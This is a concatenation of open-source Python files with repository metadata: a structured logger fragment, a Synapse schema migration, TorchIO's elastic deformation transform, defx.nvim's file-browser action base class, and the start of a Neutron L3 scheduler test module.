the logger will raise a :exc:`LoggerShutdownError`.
This is also called implicitly from the destructor or
when exiting the context manager.
"""
self._log_data("shutdown", data)
self._state.has_shutdown = True
def __enter__(self):
return self
def __exit__(self, exc, val, tb):
self.shutdown()
def _log_func(level_name):
@log_action(Unicode("message"), Any("exc_info", default=False))
def log(self, data):
exc_info = data.pop("exc_info", None)
if exc_info:
if not isinstance(exc_info, tuple):
exc_info = sys.exc_info()
if exc_info != (None, None, None):
bt = traceback.format_exception(*exc_info)
data["stack"] = "\n".join(bt)
data["level"] = level_name
self._log_data("log", data)
log.__doc__ = (
"""Log a message with level %s
:param message: The string message to log
:param exc_info: Either a boolean indicating whether to include a traceback
derived from sys.exc_info() or a three-item tuple in the
same format as sys.exc_info() containing exception information
to log.
"""
% level_name
)
log.__name__ = str(level_name).lower()
return log
def _lint_func(level_name):
@log_action(
Unicode("path"),
Unicode("message", default=""),
Int("lineno", default=0),
Int("column", default=None, optional=True),
Unicode("hint", default=None, optional=True),
Unicode("source", default=None, optional=True),
Unicode("rule", default=None, optional=True),
Tuple((Int, Int), "lineoffset", default=None, optional=True),
Unicode("linter", default=None, optional=True),
)
def lint(self, data):
data["level"] = level_name
self._log_data("lint", data)
lint.__doc__ = """Log an error resulting from a failed lint check
:param linter: name of the linter that flagged this error
:param path: path to the file containing the error
:param message: text describing the error
:param lineno: line number that contains the error
:param column: column containing the error
:param hint: suggestion for fixing the error (optional)
:param source: source code context of the error (optional)
:param rule: name of the rule that was violated (optional)
:param lineoffset: denotes an error spans multiple lines, of the form
(<lineno offset>, <num lines>) (optional)
"""
lint.__name__ = str("lint_%s" % level_name)
return lint
# Create all the methods on StructuredLog for log/lint levels
for level_name in log_levels:
setattr(StructuredLogger, level_name.lower(), _log_func(level_name))
for level_name in lint_levels:
level_name = level_name.lower()
name = "lint_%s" % level_name
setattr(StructuredLogger, name, _lint_func(level_name))
class StructuredLogFileLike(object):
"""Wrapper for file-like objects to redirect writes to logger
instead. Each call to `write` becomes a single log entry of type `log`.
When using this it is important that the callees i.e. the logging
handlers do not themselves try to write to the wrapped file as this
will cause infinite recursion.
:param logger: `StructuredLogger` to which to redirect the file write operations.
:param level: log level to use for each write.
:param prefix: String prefix to prepend to each log entry.
"""
def __init__(self, logger, level="info", prefix=None):
self.logger = logger
self.log_func = getattr(self.logger, level)
self.prefix = prefix
def write(self, data):
if data.endswith("\n"):
data = data[:-1]
if data.endswith("\r"):
data = data[:-1]
if self.prefix is not None:
data = "%s: %s" % (self.prefix, data)
self.log_func(data)
def flush(self):
pass
|
9df3dd6f0ad7d760a1b1a19f44c67c91a81c2458
|
7343ece3b82ac87a594865c4074623b45b0297b4
|
/synapse/storage/schema/main/delta/37/remove_auth_idx.py
|
d672f9b43cdf21098334fd65d26faab4558e90de
|
[
"Apache-2.0"
] |
permissive
|
matrix-org/synapse
|
a00111f83310783b78e2996557f8bbae4d9fb229
|
d35bed8369514fe727b4fe1afb68f48cc8b2655a
|
refs/heads/develop
| 2023-09-05T05:24:20.808942
| 2023-09-04T16:14:09
| 2023-09-04T16:14:09
| 22,844,864
| 12,215
| 2,869
|
Apache-2.0
| 2023-09-14T15:20:48
| 2014-08-11T15:51:42
|
Python
|
UTF-8
|
Python
| false
| false
| 2,682
|
py
|
remove_auth_idx.py
|
# Copyright 2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from synapse.storage.database import LoggingTransaction
from synapse.storage.engines import BaseDatabaseEngine, PostgresEngine
from synapse.storage.prepare_database import get_statements
logger = logging.getLogger(__name__)
DROP_INDICES = """
-- We only ever query based on event_id
DROP INDEX IF EXISTS state_events_room_id;
DROP INDEX IF EXISTS state_events_type;
DROP INDEX IF EXISTS state_events_state_key;
-- room_id is indexed elsewhere
DROP INDEX IF EXISTS current_state_events_room_id;
DROP INDEX IF EXISTS current_state_events_state_key;
DROP INDEX IF EXISTS current_state_events_type;
DROP INDEX IF EXISTS transactions_have_ref;
-- (topological_ordering, stream_ordering, room_id) seems like a strange index,
-- and is used incredibly rarely.
DROP INDEX IF EXISTS events_order_topo_stream_room;
-- an equivalent index to this actually gets re-created in delta 41, because it
-- turned out that deleting it wasn't a great plan :/. In any case, let's
-- delete it here, and delta 41 will create a new one with an added UNIQUE
-- constraint
DROP INDEX IF EXISTS event_search_ev_idx;
"""
POSTGRES_DROP_CONSTRAINT = """
ALTER TABLE event_auth DROP CONSTRAINT IF EXISTS event_auth_event_id_auth_id_room_id_key;
"""
SQLITE_DROP_CONSTRAINT = """
DROP INDEX IF EXISTS evauth_edges_id;
CREATE TABLE IF NOT EXISTS event_auth_new(
event_id TEXT NOT NULL,
auth_id TEXT NOT NULL,
room_id TEXT NOT NULL
);
INSERT INTO event_auth_new
SELECT event_id, auth_id, room_id
FROM event_auth;
DROP TABLE event_auth;
ALTER TABLE event_auth_new RENAME TO event_auth;
CREATE INDEX evauth_edges_id ON event_auth(event_id);
"""
def run_create(cur: LoggingTransaction, database_engine: BaseDatabaseEngine) -> None:
for statement in get_statements(DROP_INDICES.splitlines()):
cur.execute(statement)
if isinstance(database_engine, PostgresEngine):
drop_constraint = POSTGRES_DROP_CONSTRAINT
else:
drop_constraint = SQLITE_DROP_CONSTRAINT
for statement in get_statements(drop_constraint.splitlines()):
cur.execute(statement)
|
1c350af4e92696933bf6a47dc5f5d05da0f987f4
|
8b12d44618a870d0b4d11719928035f52930093f
|
/src/torchio/transforms/augmentation/spatial/random_elastic_deformation.py
|
b3aa698407e2e2ed18ecc77cd785e64e888a121d
|
[
"Apache-2.0"
] |
permissive
|
fepegar/torchio
|
a37635dbdaea5b2f797e3975a1e74c39049a9874
|
97232165c74061b0fe9e018c5377cb3ed63d67fe
|
refs/heads/main
| 2023-09-01T13:41:52.838197
| 2023-08-03T11:49:37
| 2023-08-03T11:49:37
| 224,148,738
| 1,831
| 239
|
Apache-2.0
| 2023-09-11T17:03:52
| 2019-11-26T09:10:09
|
Python
|
UTF-8
|
Python
| false
| false
| 14,122
|
py
|
random_elastic_deformation.py
|
import warnings
from numbers import Number
from typing import Sequence
from typing import Tuple
from typing import Union
import numpy as np
import SimpleITK as sitk
import torch
from .. import RandomTransform
from ... import SpatialTransform
from ....data.image import ScalarImage
from ....data.io import nib_to_sitk
from ....data.subject import Subject
from ....typing import TypeTripletFloat
from ....typing import TypeTripletInt
from ....utils import to_tuple
SPLINE_ORDER = 3
class RandomElasticDeformation(RandomTransform, SpatialTransform):
r"""Apply dense random elastic deformation.
A random displacement is assigned to a coarse grid of control points around
and inside the image. The displacement at each voxel is interpolated from
the coarse grid using cubic B-splines.
The `'Deformable Registration' <https://www.sciencedirect.com/topics/computer-science/deformable-registration>`_
topic on ScienceDirect contains useful articles explaining interpolation of
displacement fields using cubic B-splines.
.. warning:: This transform is slow as it requires expensive computations.
If your images are large you might want to use
:class:`~torchio.transforms.RandomAffine` instead.
Args:
num_control_points: Number of control points along each dimension of
the coarse grid :math:`(n_x, n_y, n_z)`.
If a single value :math:`n` is passed,
then :math:`n_x = n_y = n_z = n`.
Smaller numbers generate smoother deformations.
The minimum number of control points is ``4`` as this transform
uses cubic B-splines to interpolate displacement.
max_displacement: Maximum displacement along each dimension at each
control point :math:`(D_x, D_y, D_z)`.
The displacement along dimension :math:`i` at each control point is
:math:`d_i \sim \mathcal{U}(0, D_i)`.
If a single value :math:`D` is passed,
then :math:`D_x = D_y = D_z = D`.
Note that the total maximum displacement would actually be
:math:`D_{max} = \sqrt{D_x^2 + D_y^2 + D_z^2}`.
locked_borders: If ``0``, all displacement vectors are kept.
If ``1``, displacement of control points at the
border of the coarse grid will be set to ``0``.
If ``2``, displacement of control points at the border of the image
(red dots in the image below) will also be set to ``0``.
image_interpolation: See :ref:`Interpolation`.
Note that this is the interpolation used to compute voxel
intensities when resampling using the dense displacement field.
The value of the dense displacement at each voxel is always
interpolated with cubic B-splines from the values at the control
points of the coarse grid.
label_interpolation: See :ref:`Interpolation`.
**kwargs: See :class:`~torchio.transforms.Transform` for additional
keyword arguments.
`This gist <https://gist.github.com/fepegar/b723d15de620cd2a3a4dbd71e491b59d>`_
can also be used to better understand the meaning of the parameters.
This is an example from the
`3D Slicer registration FAQ <https://www.slicer.org/wiki/Documentation/4.10/FAQ/Registration#What.27s_the_BSpline_Grid_Size.3F>`_.
.. image:: https://www.slicer.org/w/img_auth.php/6/6f/RegLib_BSplineGridModel.png
:alt: B-spline example from 3D Slicer documentation
To generate a similar grid of control points with TorchIO,
the transform can be instantiated as follows::
>>> from torchio import RandomElasticDeformation
>>> transform = RandomElasticDeformation(
... num_control_points=(7, 7, 7), # or just 7
... locked_borders=2,
... )
Note that control points outside the image bounds are not showed in the
example image (they would also be red as we set :attr:`locked_borders`
to ``2``).
.. warning:: Image folding may occur if the maximum displacement is larger
than half the coarse grid spacing. The grid spacing can be computed
using the image bounds in physical space [#]_ and the number of control
points::
>>> import numpy as np
>>> import torchio as tio
>>> image = tio.datasets.Slicer().MRHead.as_sitk()
>>> image.GetSize() # in voxels
(256, 256, 130)
>>> image.GetSpacing() # in mm
(1.0, 1.0, 1.2999954223632812)
>>> bounds = np.array(image.GetSize()) * np.array(image.GetSpacing())
>>> bounds # mm
array([256. , 256. , 168.99940491])
>>> num_control_points = np.array((7, 7, 6))
>>> grid_spacing = bounds / (num_control_points - 2)
>>> grid_spacing
array([51.2 , 51.2 , 42.24985123])
>>> potential_folding = grid_spacing / 2
>>> potential_folding # mm
array([25.6 , 25.6 , 21.12492561])
Using a :attr:`max_displacement` larger than the computed
:attr:`potential_folding` will raise a :class:`RuntimeWarning`.
.. [#] Technically, :math:`2 \epsilon` should be added to the
image bounds, where :math:`\epsilon = 2^{-3}` `according to ITK
source code <https://github.com/InsightSoftwareConsortium/ITK/blob/633f84548311600845d54ab2463d3412194690a8/Modules/Core/Transform/include/itkBSplineTransformInitializer.hxx#L116-L138>`_.
""" # noqa: B950
def __init__(
self,
num_control_points: Union[int, Tuple[int, int, int]] = 7,
max_displacement: Union[float, Tuple[float, float, float]] = 7.5,
locked_borders: int = 2,
image_interpolation: str = 'linear',
label_interpolation: str = 'nearest',
**kwargs,
):
super().__init__(**kwargs)
self._bspline_transformation = None
self.num_control_points = to_tuple(num_control_points, length=3)
_parse_num_control_points(self.num_control_points) # type: ignore[arg-type] # noqa: B950
self.max_displacement = to_tuple(max_displacement, length=3)
_parse_max_displacement(self.max_displacement) # type: ignore[arg-type] # noqa: B950
self.num_locked_borders = locked_borders
if locked_borders not in (0, 1, 2):
raise ValueError('locked_borders must be 0, 1, or 2')
if locked_borders == 2 and 4 in self.num_control_points:
message = (
'Setting locked_borders to 2 and using less than 5 control'
'points results in an identity transform. Lock fewer borders'
' or use more control points.'
)
raise ValueError(message)
self.image_interpolation = self.parse_interpolation(
image_interpolation,
)
self.label_interpolation = self.parse_interpolation(
label_interpolation,
)
@staticmethod
def get_params(
num_control_points: TypeTripletInt,
max_displacement: Tuple[float, float, float],
num_locked_borders: int,
) -> np.ndarray:
grid_shape = num_control_points
num_dimensions = 3
coarse_field = torch.rand(*grid_shape, num_dimensions) # [0, 1)
coarse_field -= 0.5 # [-0.5, 0.5)
coarse_field *= 2 # [-1, 1]
for dimension in range(3):
# [-max_displacement, max_displacement)
coarse_field[..., dimension] *= max_displacement[dimension]
# Set displacement to 0 at the borders
for i in range(num_locked_borders):
coarse_field[i, :] = 0
coarse_field[-1 - i, :] = 0
coarse_field[:, i] = 0
coarse_field[:, -1 - i] = 0
return coarse_field.numpy()
def apply_transform(self, subject: Subject) -> Subject:
subject.check_consistent_spatial_shape()
control_points = self.get_params(
self.num_control_points, # type: ignore[arg-type]
self.max_displacement, # type: ignore[arg-type]
self.num_locked_borders,
)
arguments = {
'control_points': control_points,
'max_displacement': self.max_displacement,
'image_interpolation': self.image_interpolation,
'label_interpolation': self.label_interpolation,
}
transform = ElasticDeformation(**self.add_include_exclude(arguments))
transformed = transform(subject)
assert isinstance(transformed, Subject)
return transformed
class ElasticDeformation(SpatialTransform):
r"""Apply dense elastic deformation.
Args:
control_points:
max_displacement:
image_interpolation: See :ref:`Interpolation`.
label_interpolation: See :ref:`Interpolation`.
**kwargs: See :class:`~torchio.transforms.Transform` for additional
keyword arguments.
"""
def __init__(
self,
control_points: np.ndarray,
max_displacement: TypeTripletFloat,
image_interpolation: str = 'linear',
label_interpolation: str = 'nearest',
**kwargs,
):
super().__init__(**kwargs)
self.control_points = control_points
self.max_displacement = max_displacement
self.image_interpolation = self.parse_interpolation(
image_interpolation,
)
self.label_interpolation = self.parse_interpolation(
label_interpolation,
)
self.invert_transform = False
self.args_names = [
'control_points',
'image_interpolation',
'label_interpolation',
'max_displacement',
]
def get_bspline_transform(
self,
image: sitk.Image,
) -> sitk.BSplineTransform:
control_points = self.control_points.copy()
if self.invert_transform:
control_points *= -1
is_2d = image.GetSize()[2] == 1
if is_2d:
control_points[..., -1] = 0 # no displacement in IS axis
num_control_points = control_points.shape[:-1]
mesh_shape = [n - SPLINE_ORDER for n in num_control_points]
bspline_transform = sitk.BSplineTransformInitializer(image, mesh_shape)
parameters = control_points.flatten(order='F').tolist()
bspline_transform.SetParameters(parameters)
return bspline_transform
@staticmethod
def parse_free_form_transform(
transform: sitk.BSplineTransform,
max_displacement: Sequence[TypeTripletInt],
) -> None:
"""Issue a warning is possible folding is detected."""
coefficient_images = transform.GetCoefficientImages()
grid_spacing = coefficient_images[0].GetSpacing()
conflicts = np.array(max_displacement) > np.array(grid_spacing) / 2
if np.any(conflicts):
(where,) = np.where(conflicts)
message = (
'The maximum displacement is larger than the coarse grid'
f' spacing for dimensions: {where.tolist()}, so folding may'
' occur. Choose fewer control points or a smaller'
' maximum displacement'
)
warnings.warn(message, RuntimeWarning, stacklevel=2)
def apply_transform(self, subject: Subject) -> Subject:
no_displacement = not any(self.max_displacement)
if no_displacement:
return subject
subject.check_consistent_spatial_shape()
for image in self.get_images(subject):
if not isinstance(image, ScalarImage):
interpolation = self.label_interpolation
else:
interpolation = self.image_interpolation
transformed = self.apply_bspline_transform(
image.data,
image.affine,
interpolation,
)
image.set_data(transformed)
return subject
def apply_bspline_transform(
self,
tensor: torch.Tensor,
affine: np.ndarray,
interpolation: str,
) -> torch.Tensor:
assert tensor.dim() == 4
results = []
for component in tensor:
image = nib_to_sitk(component[np.newaxis], affine, force_3d=True)
floating = reference = image
bspline_transform = self.get_bspline_transform(image)
self.parse_free_form_transform(
bspline_transform,
self.max_displacement, # type: ignore[arg-type]
)
interpolator = self.get_sitk_interpolator(interpolation)
resampler = sitk.ResampleImageFilter()
resampler.SetReferenceImage(reference)
resampler.SetTransform(bspline_transform)
resampler.SetInterpolator(interpolator)
resampler.SetDefaultPixelValue(component.min().item())
resampler.SetOutputPixelType(sitk.sitkFloat32)
resampled = resampler.Execute(floating)
result, _ = self.sitk_to_nib(resampled)
results.append(torch.as_tensor(result))
tensor = torch.cat(results)
return tensor
def _parse_num_control_points(
num_control_points: TypeTripletInt,
) -> None:
for axis, number in enumerate(num_control_points):
if not isinstance(number, int) or number < 4:
message = (
f'The number of control points for axis {axis} must be'
f' an integer greater than 3, not {number}'
)
raise ValueError(message)
def _parse_max_displacement(
max_displacement: Tuple[float, float, float],
) -> None:
for axis, number in enumerate(max_displacement):
if not isinstance(number, Number) or number < 0:
message = (
'The maximum displacement at each control point'
f' for axis {axis} must be'
f' a number greater or equal to 0, not {number}'
)
raise ValueError(message)
|
bce003c6e9d45075e6e291e619ef4990d31a2843
|
aba5caebbaea79f798c063db4386ebe040a62d54
|
/rplugin/python3/defx/base/kind.py
|
36dd8140d224adf1a5d2d2f4b6dc08937a58854b
|
[
"MIT"
] |
permissive
|
Shougo/defx.nvim
|
9aeb30f2208043228a64c3b661fae0b98cb2c827
|
eb66962f7b9f7a4d23a1e0be122b45a88331dffa
|
refs/heads/master
| 2023-08-16T23:03:51.817726
| 2023-04-25T09:56:56
| 2023-04-25T09:56:56
| 77,885,726
| 1,336
| 144
|
NOASSERTION
| 2022-03-01T00:49:13
| 2017-01-03T05:07:46
|
Python
|
UTF-8
|
Python
| false
| false
| 15,131
|
py
|
kind.py
|
# ============================================================================
# FILE: kind.py
# AUTHOR: Shougo Matsushita <Shougo.Matsu at gmail.com>
# License: MIT license
# ============================================================================
from pathlib import Path
from pynvim import Nvim
import json
import re
import inspect
import typing
from functools import wraps, partial
from defx.action import ActionAttr
from defx.action import ActionTable
from defx.action import do_action
from defx.clipboard import ClipboardAction
from defx.context import Context
from defx.defx import Defx
from defx.session import Session
from defx.view import View
Kind = typing.Any
ACTION_FUNC = typing.Callable[[Kind, View, Defx, Context], None]
class ActionFunc:
def __init__(self, name: str, attr: ActionAttr, func: ACTION_FUNC):
self._is_action = True
self._name = name
self._attr = attr
self._func = func
def __call__(self, kind: Kind, view: View, defx: Defx,
context: Context) -> None:
return self._func(kind, view, defx, context)
def action(name: str, attr: ActionAttr = ActionAttr.NONE
) -> typing.Callable[[ACTION_FUNC], ACTION_FUNC]:
def wrapper(func: ACTION_FUNC) -> ACTION_FUNC:
f = ActionFunc(name, attr, func)
@wraps(f)
def inner_wrapper(kind: Kind, view: View, defx: Defx,
context: Context) -> None:
return f(kind, view, defx, context)
return inner_wrapper
return wrapper
class Base:
def __init__(self, vim: Nvim) -> None:
self.vim = vim
self.name = 'base'
def get_actions(self) -> typing.Dict[str, ActionTable]:
def predicate(o: object) -> bool:
return hasattr(o, '_is_action')
actions = {}
for member in inspect.getmembers(self, predicate):
func = member[1]
actions[func._name] = ActionTable(
func=partial(func._func, self), attr=func._attr)
return actions
@action(name='add_session', attr=ActionAttr.NO_TAGETS)
def _add_session(self, view: View, defx: Defx, context: Context) -> None:
path = context.args[0] if context.args else defx._cwd
if path[-1] == '/':
# Remove the last slash
path = path[: -1]
opened_candidates = [] if context.args else list(
defx._opened_candidates)
opened_candidates.sort()
session: Session
if path in view._sessions:
old_session = view._sessions[path]
session = Session(
name=old_session.name, path=old_session.path,
opened_candidates=opened_candidates)
else:
name = Path(path).name
session = Session(
name=name, path=path,
opened_candidates=opened_candidates)
view.print_msg(f'Session "{name}" is created')
view._sessions[session.path] = session
self._save_session(view, defx, context)
@action(name='call', attr=ActionAttr.REDRAW)
def _call(self, view: View, defx: Defx, context: Context) -> None:
"""
Call the function.
"""
function = context.args[0] if context.args else None
if not function:
return
dict_context = context._asdict()
dict_context['cwd'] = defx._cwd
dict_context['targets'] = [
str(x['action__path']) for x in context.targets]
view._vim.call(function, dict_context)
@action(name='change_filtered_files', attr=ActionAttr.REDRAW)
def _change_filtered_files(self, view: View, defx: Defx,
context: Context) -> None:
filtered_files = context.args[0] if context.args else view._vim.call(
'defx#util#input',
f'{".".join(defx._filtered_files)} -> ',
'.'.join(defx._filtered_files))
defx._filtered_files = filtered_files.split(',')
@action(name='change_ignored_files', attr=ActionAttr.REDRAW)
def _change_ignored_files(self, view: View, defx: Defx,
context: Context) -> None:
ignored_files = context.args[0] if context.args else view._vim.call(
'defx#util#input',
f'{".".join(defx._ignored_files)} -> ',
'.'.join(defx._ignored_files))
defx._ignored_files = ignored_files.split(',')
@action(name='clear_clipboard', attr=ActionAttr.NO_TAGETS)
def _clear_clipboard(self, view: View, defx: Defx,
context: Context) -> None:
view._clipboard.action = ClipboardAction.NONE
view._clipboard.candidates = []
@action(name='clear_select_all',
attr=ActionAttr.MARK | ActionAttr.NO_TAGETS)
def _clear_select_all(self, view: View, defx: Defx,
context: Context) -> None:
for candidate in [x for x in view._candidates
if x['_defx_index'] == defx._index]:
candidate['is_selected'] = False
@action(name='close_tree', attr=ActionAttr.TREE | ActionAttr.CURSOR_TARGET)
def _close_tree(self, view: View, defx: Defx, context: Context) -> None:
for target in context.targets:
if target['is_directory'] and target['is_opened_tree']:
view.close_tree(target['action__path'], defx._index)
else:
view.close_tree(target['action__path'].parent, defx._index)
view.search_file(target['action__path'].parent, defx._index)
@action(name='delete_session', attr=ActionAttr.NO_TAGETS)
def _delete_session(self, view: View, defx: Defx,
context: Context) -> None:
if not context.args:
return
session_name = context.args[0]
if session_name not in view._sessions:
return
view._sessions.pop(session_name)
self._save_session(view, defx, context)
@action(name='load_session', attr=ActionAttr.NO_TAGETS)
def _load_session(self, view: View, defx: Defx, context: Context) -> None:
session_file = Path(context.session_file)
if not context.session_file or not session_file.exists():
return
loaded_session = json.loads(session_file.read_text())
if 'sessions' not in loaded_session:
return
view._sessions = {}
for path, session in loaded_session['sessions'].items():
view._sessions[path] = Session(**session)
view._vim.current.buffer.vars['defx#_sessions'] = [
x._asdict() for x in view._sessions.values()
]
@action(name='multi')
def _multi(self, view: View, defx: Defx, context: Context) -> None:
for arg in context.args:
args: typing.List[typing.Union[str, typing.List[str]]]
if isinstance(arg, list):
args = arg
else:
args = [arg]
action_args = ((args[1] if isinstance(args[1], list)
else [args[1]])
if len(args) > 1 else [])
do_action(view, defx, str(args[0]),
context._replace(args=action_args))
@action(name='check_redraw', attr=ActionAttr.NO_TAGETS)
def _nop(self, view: View, defx: Defx, context: Context) -> None:
pass
@action(name='open_tree', attr=ActionAttr.TREE | ActionAttr.CURSOR_TARGET)
def _open_tree(self, view: View, defx: Defx, context: Context) -> None:
nested = False
recursive_level = 0
toggle = False
for arg in context.args:
if arg == 'nested':
nested = True
elif arg == 'recursive':
recursive_level = 20
elif re.search(r'recursive:\d+', arg):
recursive_level = int(arg.split(':')[1])
elif arg == 'toggle':
toggle = True
for target in [x for x in context.targets if x['is_directory']]:
if toggle and target['is_directory'] and target['is_opened_tree']:
self._close_tree(
view, defx, context._replace(targets=[target]))
else:
view.open_tree(target['action__path'],
defx._index, nested, recursive_level)
@action(name='open_tree_recursive',
attr=ActionAttr.TREE | ActionAttr.CURSOR_TARGET)
def _open_tree_recursive(self, view: View, defx: Defx,
context: Context) -> None:
level = context.args[0] if context.args else '20'
self._open_tree(view, defx, context._replace(
args=context.args + ['recursive:' + level]))
@action(name='open_or_close_tree',
attr=ActionAttr.TREE | ActionAttr.CURSOR_TARGET)
def _open_or_close_tree(self, view: View, defx: Defx,
context: Context) -> None:
self._open_tree(view, defx, context._replace(
args=context.args + ['toggle']))
@action(name='print')
def _print(self, view: View, defx: Defx, context: Context) -> None:
for target in context.targets:
view.print_msg(str(target['action__path']))
@action(name='quit', attr=ActionAttr.NO_TAGETS)
def _quit(self, view: View, defx: Defx, context: Context) -> None:
view.quit()
@action(name='redraw', attr=ActionAttr.NO_TAGETS)
def _redraw(self, view: View, defx: Defx, context: Context) -> None:
view.redraw(True)
@action(name='repeat', attr=ActionAttr.MARK)
def _repeat(self, view: View, defx: Defx, context: Context) -> None:
do_action(view, defx, view._prev_action, context)
@action(name='resize', attr=ActionAttr.NO_TAGETS)
def _resize(self, view: View, defx: Defx, context: Context) -> None:
if not context.args:
return
view._context = view._context._replace(winwidth=int(context.args[0]))
view._init_window()
view.redraw(True)
@action(name='save_session', attr=ActionAttr.NO_TAGETS)
def _save_session(self, view: View, defx: Defx, context: Context) -> None:
view._vim.current.buffer.vars['defx#_sessions'] = [
x._asdict() for x in view._sessions.values()
]
if not context.session_file:
return
session_file = Path(context.session_file)
session_file.write_text(json.dumps({
'version': view._session_version,
'sessions': {x: y._asdict() for x, y in view._sessions.items()}
}))
@action(name='search', attr=ActionAttr.NO_TAGETS)
def _search(self, view: View, defx: Defx, context: Context) -> None:
if not context.args or not context.args[0]:
return
search_path = Path(context.args[0])
if not search_path.is_absolute():
# Use relative directory instead.
search_path = Path(Path(defx._cwd).joinpath(context.args[0]))
view.search_file(search_path, defx._index)
@action(name='search_recursive', attr=ActionAttr.NO_TAGETS)
def _search_recursive(self, view: View, defx: Defx,
context: Context) -> None:
if not context.args or not context.args[0]:
return
search_path = Path(context.args[0])
if not search_path.is_absolute():
# Use relative directory instead.
search_path = Path(Path(defx._cwd).joinpath(context.args[0]))
if not view.search_recursive(search_path, defx._index):
# Not found in current path.
# Change defx directory to "search_path".
view.cd(defx, defx._source.name,
str(search_path.parent), context.cursor)
view.search_recursive(search_path, defx._index)
@action(name='toggle_columns', attr=ActionAttr.REDRAW)
def _toggle_columns(self, view: View, defx: Defx,
context: Context) -> None:
"""
Toggle the current columns.
"""
columns = (context.args[0] if context.args else '').split(':')
if not columns:
return
current_columns = [x.name for x in view._columns]
if columns == current_columns:
# Use default columns
columns = context.columns.split(':')
view._init_columns(columns)
@action(name='toggle_ignored_files', attr=ActionAttr.REDRAW)
def _toggle_ignored_files(self, view: View, defx: Defx,
context: Context) -> None:
defx._enabled_ignored_files = not defx._enabled_ignored_files
@action(name='toggle_select', attr=ActionAttr.MARK | ActionAttr.NO_TAGETS)
def _toggle_select(self, view: View, defx: Defx, context: Context) -> None:
candidate = view.get_cursor_candidate(context.cursor)
if not candidate:
return
candidate['is_selected'] = not candidate['is_selected']
@action(name='toggle_select_all',
attr=ActionAttr.MARK | ActionAttr.NO_TAGETS)
def _toggle_select_all(self, view: View, defx: Defx,
context: Context) -> None:
for candidate in [x for x in view._candidates
if not x['is_root'] and
x['_defx_index'] == defx._index]:
candidate['is_selected'] = not candidate['is_selected']
@action(name='toggle_select_visual',
attr=ActionAttr.MARK | ActionAttr.NO_TAGETS)
def _toggle_select_visual(self, view: View, defx: Defx,
context: Context) -> None:
if context.visual_start <= 0 or context.visual_end <= 0:
return
start = context.visual_start - 1
end = min([context.visual_end, len(view._candidates)])
for candidate in [x for x in view._candidates[start:end]
if not x['is_root'] and
x['_defx_index'] == defx._index]:
candidate['is_selected'] = not candidate['is_selected']
@action(name='toggle_sort', attr=ActionAttr.MARK |
ActionAttr.NO_TAGETS | ActionAttr.REDRAW)
def _toggle_sort(self, view: View, defx: Defx, context: Context) -> None:
"""
Toggle the current sort method.
"""
sort = context.args[0] if context.args else ''
if sort == defx._sort_method:
# Use default sort method
defx._sort_method = context.sort
else:
defx._sort_method = sort
@action(name='yank_path')
def _yank_path(self, view: View, defx: Defx, context: Context) -> None:
mods = context.args[0] if context.args else ''
paths = [str(x['action__path']) for x in context.targets]
if mods:
paths = [view._vim.call('fnamemodify', x, mods) for x in paths]
yank = '\n'.join(paths)
view._vim.call('setreg', '"', yank)
if (view._vim.call('has', 'clipboard') or
view._vim.call('has', 'xterm_clipboard')):
view._vim.call('setreg', '+', yank)
view.print_msg('Yanked:\n' + yank)
|
5cec9fcfcfb9140cc58eb71007802e685566b32f
|
bed34365a9dab825fd9f4a4ff1b0863f441266ac
|
/neutron/tests/unit/scheduler/test_l3_agent_scheduler.py
|
b729e0f78b3a45b978b4c11efc6e1a210be55c8e
|
[
"Apache-2.0"
] |
permissive
|
openstack/neutron
|
0913ee3cd69d5bdb9c10aa084d4e1803abee320c
|
dde31aae392b80341f6440eb38db1583563d7d1f
|
refs/heads/master
| 2023-08-31T13:09:41.831598
| 2023-08-31T11:37:30
| 2023-08-31T11:37:30
| 2,400,289
| 1,174
| 1,325
|
Apache-2.0
| 2022-06-29T08:00:05
| 2011-09-16T16:04:08
|
Python
|
UTF-8
|
Python
| false
| false
| 97,948
|
py
|
test_l3_agent_scheduler.py
|
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import contextlib
import datetime
from unittest import mock
from neutron_lib.api import attributes
from neutron_lib.api.definitions import l3_ext_ha_mode
from neutron_lib.api.definitions import network_ha
from neutron_lib.api.definitions import portbindings
from neutron_lib.api.definitions import router_availability_zone
from neutron_lib.callbacks import events
from neutron_lib.callbacks import resources
from neutron_lib import constants
from neutron_lib import context as n_context
from neutron_lib.exceptions import l3 as l3_exc
from neutron_lib import fixture
from neutron_lib.plugins import constants as plugin_constants
from neutron_lib.plugins import directory
from neutron_lib import rpc as n_rpc
from oslo_config import cfg
from oslo_utils import importutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
from sqlalchemy import orm
import testscenarios
import testtools
from neutron.db import db_base_plugin_v2 as db_v2
from neutron.db import l3_db
from neutron.db import l3_dvr_db
from neutron.db import l3_dvr_ha_scheduler_db
from neutron.db import l3_dvrscheduler_db
from neutron.db import l3_hamode_db
from neutron.db import l3_hascheduler_db
from neutron.extensions import l3agentscheduler as l3agent
from neutron import manager
from neutron.objects import agent as agent_obj
from neutron.objects import l3_hamode
from neutron.objects import l3agent as rb_obj
from neutron import quota
from neutron.scheduler import l3_agent_scheduler
from neutron.tests import base
from neutron.tests.common import helpers
from neutron.tests.unit.db import test_db_base_plugin_v2
from neutron.tests.unit.extensions import test_l3
from neutron.tests.unit import testlib_api
# the below code is required for the following reason
# (as documented in testscenarios)
"""Multiply tests depending on their 'scenarios' attribute.
This can be assigned to 'load_tests' in any test module to make this
automatically work across tests in the module.
"""
load_tests = testscenarios.load_tests_apply_scenarios
HOST_DVR = 'my_l3_host_dvr'
HOST_DVR_SNAT = 'my_l3_host_dvr_snat'
DEVICE_OWNER_COMPUTE = constants.DEVICE_OWNER_COMPUTE_PREFIX + 'fake'
DEVICE_OWNER_COMPUTE_NOVA = constants.DEVICE_OWNER_COMPUTE_PREFIX + 'nova'
